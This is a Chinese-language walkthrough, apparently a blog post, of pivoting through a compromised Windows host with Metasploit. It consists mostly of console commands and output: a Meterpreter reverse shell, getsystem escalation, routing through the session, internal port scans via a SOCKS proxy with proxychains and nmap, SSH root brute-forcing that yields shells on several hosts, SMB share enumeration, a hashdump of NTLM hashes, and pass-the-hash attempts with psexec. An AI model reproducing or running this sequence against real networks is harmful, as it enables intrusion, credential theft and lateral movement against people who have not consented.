Metasploit跨路由器访问
首先得获得一个内网的SHELL 转移到SYSTEM权限
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.1.103:4444
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 192.168.1.100
[*] Meterpreter session 1 opened (192.168.1.103:4444 -> 192.168.1.100:51898) at 2012-11-04 20:49:37 +0800
meterpreter > getuid
Server username: BRK-FC17123537C\Administrator
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
接着查看网段
meterpreter > ifconfig
Interface 1
============
Name : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU : 1520
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
Interface 2
============
Name : AMD PCNET Family PCI Ethernet Adapter - ���ݰ��ƻ������Ͷ˿�
Hardware MAC : 00:50:56:28:2c:de
MTU : 1500
IPv4 Address : 5.5.5.9
IPv4 Netmask : 255.255.255.0
Interface 2
============
Name : AMD PCNET Family PCI Ethernet Adapter - pencS��R
z�_�W�z�S
Hardware MAC : 00:50:56:28:2c:de
MTU : 1500
IPv4 Address : 5.5.5.9
IPv4 Netmask : 255.255.255.0
meterpreter >
5.5.5.9 ping测试一下
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > ping 5.5.5.9
[*] exec: ping 5.5.5.9
^CInterrupt: use the 'exit' command to quit
msf exploit(handler) >
无反应 接着看下网络信息
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > route
IPv4 network routes
===================
Subnet Netmask Gateway Metric Interface
------ ------- ------- ------ ---------
0.0.0.0 0.0.0.0 5.5.5.2 10 2
5.5.5.0 255.255.255.0 5.5.5.9 10 2
5.5.5.9 255.255.255.255 127.0.0.1 10 1
5.255.255.255 255.255.255.255 5.5.5.9 10 2
127.0.0.0 255.0.0.0 127.0.0.1 1 1
224.0.0.0 240.0.0.0 5.5.5.9 10 2
255.255.255.255 255.255.255.255 5.5.5.9 1 2
No IPv6 routes were found.
meterpreter >
查找网络接口:
Local subnet: 5.5.5.0/255.255.255.0
只有一个 route 试试
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > route add 5.5.5.0 255.255.255.0 1
[*] Route added
msf exploit(handler) > route print
Active Routing Table
====================
Subnet Netmask Gateway
------ ------- -------
5.5.5.0 255.255.255.0 Session 1
msf exploit(handler) >
注意 msf exploit(handler) > route add 5.5.5.0 255.255.255.0 1 的 最后一个 1 是sessions的会话ID route 的时候别弄错
来测试扫描一下
msf exploit(handler) > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > show options
Module options (auxiliary/scanner/portscan/tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
CONCURRENCY 10 yes The number of concurrent ports to check per host
PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS yes The target address range or CIDR identifier
THREADS 1 yes The number of concurrent threads
TIMEOUT 1000 yes The socket connect timeout in milliseconds
msf auxiliary(tcp) > set RHOSTS 5.5.5.0-254
RHOSTS => 5.5.5.0-254
msf auxiliary(tcp) > set PORTS 22,445,135,443,80,1433
PORTS => 22,445,135,443,80,1433
msf auxiliary(tcp) > exploit
[*] 5.5.5.1:445 - TCP OPEN
[*] 5.5.5.1:135 - TCP OPEN
[*] 5.5.5.1:443 - TCP OPEN
[*] 5.5.5.3:22 - TCP OPEN
[*] 5.5.5.3:80 - TCP OPEN
[*] 5.5.5.4:22 - TCP OPEN
[*] 5.5.5.5:22 - TCP OPEN
[*] 5.5.5.6:80 - TCP OPEN
[*] 5.5.5.6:135 - TCP OPEN
[*] 5.5.5.6:1433 - TCP OPEN
[*] 5.5.5.6:445 - TCP OPEN
-----省略------
查看结果:
msf auxiliary(tcp) > hosts
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
5.5.5.1 Unknown device
5.5.5.3 Unknown device
5.5.5.4 Unknown device
5.5.5.5 Unknown device
5.5.5.6 Unknown device
5.5.5.8 Unknown device
5.5.5.9 BRK-FC17123537C Microsoft Windows XP SP2 client
5.5.5.10 Unknown device
5.5.5.11 Unknown device
192.168.1.100 firewall
msf auxiliary(tcp) >
查看服务
msf auxiliary(tcp) > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
5.5.5.1 135 tcp open
5.5.5.1 443 tcp open
5.5.5.1 445 tcp open
5.5.5.3 80 tcp open
5.5.5.3 22 tcp open
5.5.5.4 22 tcp open
5.5.5.5 22 tcp open
5.5.5.6 80 tcp open
5.5.5.6 135 tcp open
5.5.5.6 445 tcp open
5.5.5.6 1433 tcp open
5.5.5.8 443 tcp open
5.5.5.8 80 tcp open
5.5.5.8 22 tcp open
5.5.5.9 80 tcp open
5.5.5.9 135 tcp open
5.5.5.9 443 tcp open
5.5.5.9 445 tcp open
5.5.5.10 445 tcp open
5.5.5.10 135 tcp open
5.5.5.10 443 tcp open
5.5.5.10 80 tcp open
5.5.5.11 22 tcp open
msf auxiliary(tcp) >
我们可以根据服务做一些事情 开SSH的比较多 MSF的扫描速度很扯淡 可以开个代理给NMAP扫描 如:
msf > use auxiliary/server/socks4a
msf auxiliary(socks4a) > show options
Module options (auxiliary/server/socks4a):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The address to listen on
SRVPORT 1080 yes The port to listen on.
msf auxiliary(socks4a) > exit
[*] You have active sessions open, to exit anyway type "exit -y"
[*] Starting the socks4a proxy server
msf auxiliary(socks4a) >
接着就需要神器proxychains 来帮助我们使用代理接口 编辑proxychains 配置文件
brk@Dis9Team:/tmp$ sudo nano /etc/proxychains.conf
修改默认代理如下:
socks4 127.0.0.1 1080
测试
msf auxiliary(socks4a) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 BRK-FC17123537C\Administrator @ BRK-FC17123537C 192.168.1.103:4444 -> 192.168.1.100:51898 (5.5.5.9)
msf auxiliary(socks4a) >
IP 5.5.5.9 链接他的445端口
brk@Dis9Team:/tmp$ proxychains nc -vv 5.5.5.9 445
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:1080-<><>-5.5.5.9:445-<><>-OK
Connection to 5.5.5.9 445 port [tcp/microsoft-ds] succeeded!
成功 开始用NMAP探测
brk@Dis9Team:/tmp$ proxychains nmap -sP 5.5.5.0/24
ProxyChains-3.1 (http://proxychains.sf.net)
Starting Nmap 6.00 ( http://nmap.org ) at 2012-11-04 21:27 CST
|S-chain|-<>-127.0.0.1:1080-<><>-5.5.5.1:80-<--denied
|S-chain|-<>-127.0.0.1:1080-<><>-5.5.5.4:80-<--denied
|S-chain|-<>-127.0.0.1:1080-<><>-5.5.5.7:80-<--timeout
|S-chain|-<>-127.0.0.1:1080-<><>-5.5.5.10:80-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-5.5.5.11:80-<--denied
扫描一个主机
brk@Dis9Team:/tmp$ sudo proxychains nmap 5.5.5.5 -sV -sT -T5 -O -PN
|S-chain|-<>-127.0.0.1:1080-<><>-5.5.5.5:256-<--timeout
|S-chain|-<>-127.0.0.1:1080-<><>-5.5.5.5:110-<--timeout
|S-chain|-<>-127.0.0.1:1080-<><>-5.5.5.5:3306-<--timeout
|S-chain|-<>-127.0.0.1:1080-<><>-5.5.5.5:8080-<--timeout
|S-chain|-<>-127.0.0.1:1080-<><>-5.5.5.5:445-<--timeout
|S-chain|-<>-127.0.0.1:1080-<><>-5.5.5.5:22-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-5.5.5.5:22-<><>-OK
Nmap scan report for 5.5.5.5
Host is up (0.10s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Timing level 5 (Insane) used
No OS matches for host
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.06 seconds
brk@Dis9Team:/tmp$
开放了SSH 用MSF破解试试
msf auxiliary(ssh_login) > exploit
[*] 5.5.5.5:22 SSH - Starting bruteforce
[*] 5.5.5.5:22 SSH - [1/4] - Trying: username: 'root' with password: ''
[-] 5.5.5.5:22 SSH - [1/4] - Failed: 'root':''
[*] 5.5.5.5:22 SSH - [2/4] - Trying: username: 'root' with password: 'root'
[-] 5.5.5.5:22 SSH - [2/4] - Failed: 'root':'root'
[*] 5.5.5.5:22 SSH - [3/4] - Trying: username: 'root' with password: '123456'
-----不给你看--------------
[*] Command shell session 2 opened (192.168.1.103-192.168.1.100:0 -> 5.5.5.5:22) at 2012-11-04 21:32:58 +0800
[+] 5.5.5.5:22 SSH - [3/4] - Success: 'root':'不给你看' 'uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=root:system_r:unconfined_t:SystemLow-SystemHigh Linux CENTOS 2.6.18-194.el5 #1 SMP Fri Apr 2 14:58:35 EDT 2010 i686 i686 i386 GNU/Linux '
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) >
成功破解出了SSH密码
链接试试
msf auxiliary(ssh_login) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 BRK-FC17123537C\Administrator @ BRK-FC17123537C 192.168.1.103:4444 -> 192.168.1.100:51898 (5.5.5.9)
2 shell linux SSH root:不给你看 (5.5.5.5:22) 192.168.1.103-192.168.1.100:0 -> 5.5.5.5:22 (5.5.5.5)
msf auxiliary(ssh_login) > sessions -i 2
[*] Starting interaction with 2...
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=root:system_r:unconfined_t:SystemLow-SystemHigh
cat /proc/version
Linux version 2.6.18-194.el5 (mockbuild@builder16.centos.org) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-48)) #1 SMP Fri Apr 2 14:58:35 EDT 2010
lsb_release -a
LSB Version: :core-3.1-ia32:core-3.1-noarch:graphics-3.1-ia32:graphics-3.1-noarch
Distributor ID: CentOS
Description: CentOS release 5.5 (Final)
Release: 5.5
Codename: Final
貌似开SSH的很多 批量扫描吧
msf auxiliary(ssh_login) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 BRK-FC17123537C\Administrator @ BRK-FC17123537C 192.168.1.103:4444 -> 192.168.1.100:51898 (5.5.5.9)
3 shell linux SSH root:123456 (5.5.5.3:22) 192.168.1.103-192.168.1.100:0 -> 5.5.5.3:22 (5.5.5.3)
4 shell linux SSH root:a (5.5.5.8:22) 192.168.1.103-192.168.1.100:0 -> 5.5.5.8:22 (5.5.5.8)
5 shell linux SSH root:123456 (5.5.5.5:22) 192.168.1.103-192.168.1.100:0 -> 5.5.5.5:22 (5.5.5.5)
6 shell linux SSH root:123456 (5.5.5.4:22) 192.168.1.103-192.168.1.100:0 -> 5.5.5.4:22 (5.5.5.4)
7 shell linux SSH root:123456 (5.5.5.11:22) 192.168.1.103-192.168.1.100:0 -> 5.5.5.11:22 (5.5.5.11)
msf auxiliary(ssh_login) >
还有几台WINDOWS的呢?
msf auxiliary(ssh_login) > services -p 445
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
5.5.5.1 445 tcp open
5.5.5.6 445 tcp open
5.5.5.9 445 tcp open
5.5.5.10 445 tcp open
msf auxiliary(ssh_login) >
测试SMB探测
msf auxiliary(smb_enumshares) > set RHOSTS 5.5.5.1
RHOSTS => 5.5.5.1
msf auxiliary(smb_enumshares) > run
[*] 5.5.5.1:445 ADMIN$ -
z�{t (DISK), C$ - ؞��qQ�N (DISK), D$ - ؞��qQ�N (DISK), E$ - ؞��qQ�N (DISK), F$ - ؞��qQ�N (DISK), ftp - (DISK), H$ - ؞��qQ�N (DISK), IPC$ -
z IPC (IPC)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb_enumshares) >
貌似有东西
查看一下:
不晓得有木有九区狗的名单,有就全部封杀了 恩访问下
brk@Dis9Team:/tmp/123$ proxychains smbclient //5.5.5.1/ftp
ProxyChains-3.1 (http://proxychains.sf.net)
Enter brk's password:
|S-chain|-<>-127.0.0.1:1080-<><>-5.5.5.1:445-<><>-OK
Domain=[DIS91] OS=[Windows 7 Ultimate 7601 Service Pack 1] Server=[Windows 7 Ultimate 6.1]
smb: \> dir
. D 0 Sun Nov 4 20:11:13 2012
.. D 0 Sun Nov 4 20:11:13 2012
1 D 0 Mon Oct 29 03:12:49 2012
1.rar A 5554064923 Sat Oct 27 16:35:12 2012
1.zip A 2165820895 Sun Oct 7 10:09:40 2012
2.iso A 728018944 Tue Oct 9 19:58:06 2012
2.zip A 1220728381 Sun Oct 14 00:41:59 2012
AspSweb.exe A 649745 Fri Aug 15 16:45:34 2008
burpsuite.jar A 8198291 Thu Sep 27 03:29:29 2012
CS1_5_chsV1.0.zip A 283779223 Sat Sep 29 15:19:44 2012
down D 0 Sun Sep 23 20:19:12 2012
ftp.zip A 11599105 Sun Sep 30 09:54:53 2012
HdReport.txt A 2479 Thu Sep 27 10:20:01 2012
kubuntu-12.04.1-desktop-amd64.iso A 736407552 Sun Sep 16 22:07:52 2012
My Games.zip A 3595119 Wed Oct 10 18:49:53 2012
TorchlightII_chsV1.11.5.3.zip A 1609147375 Wed Oct 10 18:48:25 2012
Ubuntu1.zip A 2833754852 Wed Oct 10 11:28:54 2012
users.dat A 74 Sun Oct 14 00:47:32 2012
VRMPVOL_CNsp2.iso A 621346816 Sat Sep 29 10:20:44 2012
yxdown.com_TorchlightII_chsV1.11.5.3.exe A 1590876064 Wed Sep 26 05:09:13 2012
浮生偷换.mp3 A 6303705 Sat Sep 15 21:21:19 2012
金粉沉埋.mp3 A 5532570 Sat Sep 15 22:49:35 2012
36381 blocks of size 4194304. 14743 blocks available
smb: \>
有水一的歌曲哦
先获得帐号密码
meterpreter > hashdump
Administrator:500:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:54688ec262626f406dadd35533ff3375:19d7141e4c62b1f5318db46b6d0f1390:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:30f6b88b04ce59ef6e72ad5f4df330ee:::
meterpreter >
可以进行PASS THE HASH攻击
msf exploit(psexec) > exploit
[*] Started reverse handler on 192.168.1.103:4444
[*] Connecting to the server...
[*] Authenticating to 5.5.5.9:445|WORKGROUP as user ''...
[-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0)
^Cmsf exploit(psexec) > set RHOST 5.5.5.6
RHOST => 5.5.5.6
msf exploit(psexec) > exploit
[*] Started reverse handler on 192.168.1.103:4444
[*] Connecting to the server...
[*] Authenticating to 5.5.5.6:445|WORKGROUP as user ''...
[-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0)
^Cmsf exploit(psexec) >
失败了 破解密码